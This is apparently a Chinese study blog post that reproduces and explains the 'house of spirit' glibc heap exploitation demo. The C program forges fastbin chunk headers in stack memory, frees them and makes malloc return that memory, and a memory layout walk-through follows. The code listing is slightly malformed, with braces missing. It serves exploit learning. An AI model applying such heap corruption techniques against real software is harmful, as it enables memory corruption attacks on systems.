6.house_of_spirit

Posted 2021-12-30 pfcode

源代码

 1 #include <stdio.h>
 2 #include <stdlib.h>
 3 
 4 int main()
 5 
 6     fprintf(stderr, "This file demonstrates the house of spirit attack.\\n");
 7 
 8     fprintf(stderr, "Calling malloc() once so that it sets up its memory.\\n");
 9     malloc(1);
10 
11     fprintf(stderr, "We will now overwrite a pointer to point to a fake ‘fastbin‘ region.\\n");
12     unsigned long long *a;
13     // This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
14     unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));
15 
16     fprintf(stderr, "This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.\\n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[9]);
17 
18     fprintf(stderr, "This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\\n");
19     fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \\n");
20     fake_chunks[1] = 0x40; // this is the size
21 
22     fprintf(stderr, "The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\\n");
23         // fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8
24     fake_chunks[9] = 0x1234; // nextsize
25 
26     fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\\n", &fake_chunks[1]);
27     fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\\n");
28     a = &fake_chunks[2];
29 
30     fprintf(stderr, "Freeing the overwritten pointer.\\n");
31     free(a);
32 
33     fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\\n", &fake_chunks[1], &fake_chunks[2]);
34     fprintf(stderr, "malloc(0x30): %p\\n", malloc(0x30));
35 

运行结果

首先用数组形式申请了一块0x40大小的内存

修改成如下

1 0x00          0x0000000000000000       0x0000000000000040
2 0x10          0x0000000000000000       0x0000000000000000
3 0x20          0x0000000000000000       0x0000000000000000
4 0x30          0x0000000000000000       0x0000000000000000
5 0x40          0x0000000000000000       0x0000000000001234

在0x00到0x40遍伪造成了一个0x30+0x10大小的堆

之后又伪造了一个堆头部，size为0x1234 符合(>16b && <128kb)绕过检测

之后释放伪造的堆，即会进入0x40的fastbin

之后再申请0x30大小的堆，即会分配到这块伪造的堆

这里要注意的是大小要符合fastbin，还要修改相邻的下一块堆的size大小符合(>16b && <128kb)来绕过检测。